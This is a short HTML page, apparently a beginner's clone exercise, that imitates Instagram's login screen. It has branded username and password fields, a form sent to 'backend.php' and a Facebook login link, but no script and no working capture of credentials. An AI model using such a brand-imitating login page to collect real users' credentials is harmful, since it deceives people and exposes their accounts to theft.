<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram</title>
    <link rel="stylesheet" href="style.css">
    <link rel="shortcut icon" href="Instagram logo.png" type="image/x-icon">
</head>
<style>
    .main_section{
    border: 2px solid black;
    border-radius: 20px;
    width: 400px;
    height: 500px;
    margin-left:650px ;
    margin-top: 100px;
    padding-left: 100px;}
h1{
    font-style: --tsl-doc-gray-5;
    font-family: 'Trebuchet MS', 'Lucida Sans Unicode', 'Lucida Grande', 'Lucida Sans', Arial, sans-serif;}
img{ width: 20px;}
input{
    border: 1px solid black;
    border-radius: 20px;
    width: 350px;
    height: 30px;}
#login{
    background-color: blue;
    color: white;}
a{
    text-decoration: none;
    color: black;}
</style>
<body>
        <div class="main_section">
        <h1> <img src="Instagram.png" alt="NO Image Found">     Instagram </h1><br><br>
        <form action="backend.php">
            <input type="text" placeholder="Username/phone number/ Email"><br><br>
            <input type="text" placeholder="Password"><br><br>
            <input type="submit" value="Log In" id="login"><br><br><br><br><br><br><br>
            </form>
        <div class="sub_main">
            <img src="facebook icon.png" alt="no image found"><a href="https://facebook.com">     Login Using Facebook</a> 
               </div>
            </div>
    </body>
</html>